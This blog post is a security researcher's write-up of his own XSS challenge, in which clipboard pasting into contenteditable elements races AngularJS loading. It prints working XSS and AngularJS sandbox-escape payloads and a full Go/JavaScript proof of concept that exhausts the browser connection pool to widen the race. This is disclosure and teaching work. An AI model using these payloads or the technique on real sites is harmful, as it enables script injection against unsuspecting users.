DOM-based race condition: racing in the browser for fun

Disclaimer

All projects mentioned in this blog post have been contacted, and I confirmed that the behavior described in this article is either working as intended, already fixed, or will not be fixed.

TL;DR

The browser loads elements in the HTML from top to bottom, and some JavaScript libraries retrieve data or attributes from the DOM after the page has been completely loaded.
Because of how the contenteditable attribute works, we might have a race condition in applications that use those JavaScript libraries with the contenteditable element, depending on how the page loads the library.
In this article, I’ll explain how it’s possible and how to increase the timing window of this race.

The challenge

On the October 6th, I posted the following XSS challenge.

I made a small XSS Challenge!

Can you pop an alert on this page? (The intended solution should be hard!)

Rules are included on the challenge page: https://t.co/e4CZByywdT pic.twitter.com/Xfdbij0iPC
— RyotaK (@ryotkak) October 6, 2023

The intended solution for this challenge looks like this.

Clipboard-based XSS (aka Copy & Paste XSS)

To explain the intended solution, I must explain the clipboard-based XSS.
In 2020, Michał Bentkowski published excellent research regarding the XSS that the clipboard involves.
This research is focused on exploitation against the contenteditable attribute and the paste event handlers.

Basically, the following snippet is vulnerable to the clipboard-based XSS:

<input placeholder="Paste here" id="pasted"/>
<script>
document.addEventListener('paste', event => {
    const data = event.clipboardData.getData('text/html');
    pasted.innerHTML = data;
});
</script>

It can be exploited using the following page:

<button onclick="copy()">Click</button>
<script>
    document.addEventListener('copy', event => {
        event.preventDefault();
        event.clipboardData.setData('text/html', '<img src onerror=alert(1)>');
        alert('Please paste the copied contents into the vulnerable page');
    });
    function copy() {
        document.execCommand('copy');
    }
</script>

He also reported that the following page can be vulnerable to the clipboard-based XSS, using the vulnerability in the sanitizer of the browser:

<div contenteditable></div>

This was possible because:

The browser allows the text/html to be pasted as the HTML instead of the plain text.¹
To prevent the XSS, the browser sanitized the contents of the text/html data.
However, there were flaws in this sanitizer, allowing him to bypass it and achieve XSS or various impacts.

When writing this article, there are no known ways to bypass this sanitizer, and using the contenteditable element alone wouldn’t cause the XSS.

However, when sanitizing the pasted contents, Chromium uses the deny-list approach to prevent XSS instead of the allow-list approach, meaning that any attributes that don’t cause XSS are allowed, including custom attributes supported by the library.²

third_party/blink/renderer/core/dom/element.cc line 2545-2550

bool Element::IsScriptingAttribute(const Attribute& attribute) const {
  return IsEventHandlerAttribute(attribute) ||
         IsJavaScriptURLAttribute(attribute) ||
         IsHTMLContentAttribute(attribute) ||
         IsSVGAnimationAttributeSettingJavaScriptURL(attribute);
}

This behavior can be used to exploit libraries that assume the contents of DOM to be trusted.
For example, projects such as rails-ujs or Kanboard could be exploited by pasting data-* attributes into the contenteditable element. (CVE-2023-23913, CVE-2023-32685)

ng-* attributes

Let’s get back to the challenge.
At this point, you may have noticed that AngularJS uses ng-* attributes to control its behavior.

For example, when opened, the following snippet will execute alert(1).³

<html ng-app>
  <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.3/angular.min.js"></script>
  <div ng-init="constructor.constructor('alert(1)')()"></div>
</html>

So, you may think that by pasting the ng-* attributes into the challenge page, we can pop an alert.
But, this is not the case for AngularJS.

Target of event listeners

To make the difference obvious, I’ll explain the vulnerability in rails-ujs (CVE-2023-23913). This vulnerability also depends on the existence of the contenteditable element and can be exploited by tricking the victim pasting the malicious data into the contenteditable element.

In rails-ujs, they used the document.addEventListener("click"... to handle clicks instead of adding event listeners to each element upon loading the page.

actionview/app/javascript/rails-ujs/utils/event.js line 71-80

const delegate = (element, selector, eventType, handler) => element.addEventListener(eventType, function(e) {
  [...]
})

actionview/app/javascript/rails-ujs/index.js line 106-107

  delegate(document, linkClickSelector, "click", handleRemote)
  delegate(document, linkClickSelector, "click", handleMethod)

By using document.addEventListener, this event listener can receive events from any elements in the page, including one added after the rails-ujs is loaded.

So, CVE-2023-23913 could be exploited by simply tricking the victim to paste the malicious data to the contenteditable element after the page is loaded.

However, AngularJS adds the event listener to each element with ng-* attributes after the DOMContentLoaded event is fired.

src/ng/directive/ngEventDirs.js line 59-89

function createEventDirective($parse, $rootScope, $exceptionHandler, directiveName, eventName, forceAsync) {
  return {
    restrict: 'A',
    compile: function($element, attr) {
      [...]
      var fn = $parse(attr[directiveName]);
      return function ngEventHandler(scope, element) {
        element.on(eventName, function(event) {
          [...]
        });
      };
    }
  };
}

  on: function jqLiteOn(element, type, fn, unsupported) {
    [...]
    var addHandler = function(type, specialHandlerWrapper, noEventListener) {
      var eventFns = events[type];

      if (!eventFns) {
        eventFns = events[type] = [];
        eventFns.specialHandlerWrapper = specialHandlerWrapper;
        if (type !== '$destroy' && !noEventListener) {
          element.addEventListener(type, handle);
        }
      }

      eventFns.push(fn);
    };
    [...]
  },

This means that simply pasting the following payload into the challenge page doesn’t work.

<div ng-app><div ng-click="constructor.constructor('alert(1)')()">Click me</div></div>

HTML loading order

Before going further, I must explain how the browser loads an HTML document.

The browser normally loads the HTML document from top to bottom.⁴
For example:

<html>
  <div id="test"></div>
  <script>
    document.getElementById("test").innerHTML = "<h1>Hello world!</h1>";
  </script>
</html>

Assuming the HTML above is passed to the browser, the browser loads <div> first, then evaluates the JavaScript in the <script> tag later.

So, if we reverse the order of <div> and <script>, the following error occurs:

Uncaught TypeError: Cannot set properties of null (setting 'innerHTML')
    at [first line of the JavaScript]

This is because of the ordering of loading; when the <script> tag is loaded, and the JavaScript is evaluated, the <div id="test"> element is not loaded yet.
So, document.getElementById("test") returns null, and access to the innerHTML property fails.

The code snippet to show which area is loaded

Racing with the AngularJS

Back to the challenge, we have the following HTML:

<div contenteditable>
  <h1>Solvers:</h1>
  [...]
</div>
<script src="https://angular-no-http3.ryotak.net/angular.min.js"></script>

As AngularJS evaluates ng-* attributes and other expressions once loaded, we must insert an element with the XSS payload before the AngularJS is loaded.

Since the script tag is placed below the contenteditable element, AngularJS is loaded after the contenteditable element is rendered.
So, there is approximately a 30 ms delay after the contenteditable element is rendered but before the AngularJS is fully loaded.

This race window is too tiny to exploit, but we have to trick the victim into pasting within this time window.

The intended solution

30ms is enough when exploiting a race condition where an attacker can repeatedly attempt the exploit. Still, this time, we need to trick the victim into pasting the malicious data into the contenteditable element.
Since it’s hard to trick the victim into pasting the contents within this time window, we need to extend it for the race.

After the previous graph’s Parse HTML section, the browser must fetch the AngularJS from the remote host if it’s not cached already.

Luckily, there is a technique to delay requests by exhausting the connection pool.
XS-Leaks Wiki has a good explanation about this technique, so I’ll explain the summary of it here.

In Chromium, there are hard limits to the amount of connections that can be established simultaneously.
For TCP, it is limited to 256 connections, as shown in the snippet below.⁵

net/socket/client_socket_pool_manager.cc line 32-36

// Limit of sockets of each socket pool.
int g_max_sockets_per_pool[] = {
  256,  // NORMAL_SOCKET_POOL
  256   // WEBSOCKET_SOCKET_POOL
};

As the connection pool is shared across all hosts, if we open 256 connections that won’t be disconnected (e.g., by not sending the response), no further requests can be established, and the browser will wait until one of these connections is closed.

A graph that shows the exhausted connection pool, and the browser can’t process the request from the queue

This is useful to pause the loading of the AngularJS and extend the race timing window, but we still need to open the connection to the host of the challenge page. Otherwise, the challenge page won’t load, and the contenteditable element won’t be rendered.
To deal with this, we can cancel the one connection after exhausting the connection pool and opening the challenge page, then quickly open another connection.

By doing so, the connection pool works as the following:

After exhausting the connection pool, no further connections can be established. So, the challenge page will be kept from loading.
Several seconds after opening the challenge page, we cancel one connection (①) and quickly open another connection (③). At this point, the connection to the challenge page is established (②), but the browser still needs to fetch and parse the HTML.
Once the challenge page is fetched and parsed, the browser queues the connection to the host of the AngularJS file (②) and finishes the connection to the challenge page. (①)
Because we queued another connection in the previous step, the connection pool is exhausted again, and the AngularJS file will not be fetched.
At this point, the contenteditable element is already rendered, so the victim can paste the malicious data without rushing.
After several seconds, we cancel the connection opened in step 2 (①). By doing so, the browser can open the connection to the host of the AngularJS file (②) and evaluate the contents. Since the victim pasted the malicious data into the contenteditable element before AngularJS is loaded, it will evaluate the pasted expressions, and alert(document.domain) will be executed.

By putting it all together, this challenge can be solved by using the following code:⁶

package main

import (
        "fmt"
        "log"
        "net/http"
        "strconv"
        "time"
)

const(
  SERVER_IP = ""
)

func attack(w http.ResponseWriter, r *http.Request) {
        w.Header().Set("Content-Type", "text/html")
        fmt.Fprintf(w, `
<script>
async function fill_sockets(amount) {
        return new Promise((resolve, reject) => {
                let count = 0;
                const intervalId = setInterval(() => {
                        if(count >= amount) {
                                clearInterval(intervalId);
                                resolve();
                                return;
                        }
                        fetch('http://%s:' + (28000 + count) + '/sleep', {mode: "no-cors", cache: "no-store"});
                        count++;
                }, 5);
        });
}

async function swap_connections(func, delay) {
        let timer = new AbortController();
        setTimeout(() => {
                timer.abort();
                timer = new AbortController();
                setTimeout(() => timer.abort(), delay*1000);
                fetch('http://%[1]s:28255/sleep', {mode: "no-cors", cache: "no-store", signal: timer.signal});
        }, 1000);
        fetch('http://%[1]s:28255/sleep', {mode: "no-cors", cache: "no-store", signal: timer.signal});
        func();
}

async function attack() {
        document.execCommand("copy");
        document.write("Filling the connection pool...<br>");
        await fill_sockets(255);
        document.write("Opening the victim page...<br>");
        swap_connections(() => {
                window.open('https://ryotak-challenges.github.io/xss-chall-1/', '_blank');
        }, 10);
}

document.addEventListener('copy', (e) => {
        e.preventDefault();
        e.clipboardData.setData('text/html', '<br><div data-ng-app>{{constructor.constructor("alert(document.domain)")();}}</div>');
        document.write("Copied the payload<br>");
});
</script>
<button onclick=attack()>Attack</button>`, SERVER_IP)
}

func sleep(w http.ResponseWriter, r *http.Request) {
        time.Sleep(24 * time.Hour * 365)
}

func handleRequests() {
        http.HandleFunc("/", attack)
        http.HandleFunc("/sleep", sleep)

        for i := 1; i <= 256; i++ {
                go http.ListenAndServe(":"+strconv.Itoa(28000+i), nil)
        }
        log.Fatal(http.ListenAndServe(":28000", nil))
}

func main() {
        handleRequests()
}

This technique is not limited to AngularJS; instead, it can be applied to any JavaScript library with the following conditions:

The library retrieves data from the DOM after loading the page.
The library doesn’t ignore elements under the contenteditable element.
The user of the library uses the contenteditable element and loads the library afterward.

Also, It’s important to note that some vendors consider it the responsibility of the developers using libraries not to use the libraries with the contenteditable element.

Appendix: Unintended Solutions

When releasing the challenge, I thought it was impossible to exploit this tiny race window without expanding it by using the technique above, or at least impossible to exploit it manually. Still, exploiting it was possible if you tried hard enough.

@LiveOverflow and @stueotue found a way to exploit this tiny race window:

@LiveOverflow sent a solution that repeats pasting, sometimes winning this race.

And @stueotue sent a solution that uses drag and drop, inspired by the Renwa’s write-up. It also sometimes wins the race if the timing is matched.

Both solutions are excellent, and I’m really impressed by their creativity.
This challenge was the first XSS challenge that I posted on my account, so it was a good lesson for me not to underestimate the creativity of the community ;)

The pasted data is inserted into the DOM, unlike having the value in the value property like the <input> tag. For example, pasting <a href="https://example.com">Test</a> into the contenteditable element as text/html will create the <a> tag with https://example.com as the href attribute. ↩︎
It’s interesting that Firefox seems to be using an allow-list approach when sanitizing the contents. I think there might be a way to bypass the sanitizer of Chromium. ↩︎
If you want to know why constructor.constructor('alert(1)')() is used instead of the usual alert(1), please read this article: https://portswigger.net/research/dom-based-angularjs-sandbox-escapes ↩︎
There are some exceptions, such as the defer attribute of the <script> tag, but I won’t explain them in this article. ↩︎
According to XS-Leaks Wiki, UDP is limited to 6000 connections, so if HTTP/3 is enabled, you may need to open many more connections to exhaust the connection pool. ↩︎
To prevent connection reuse of HTTP/2, this PoC uses 256 different ports instead of sending requests to the same port. (This code is a bit dirty, but it works! … at least on my machine.) ↩︎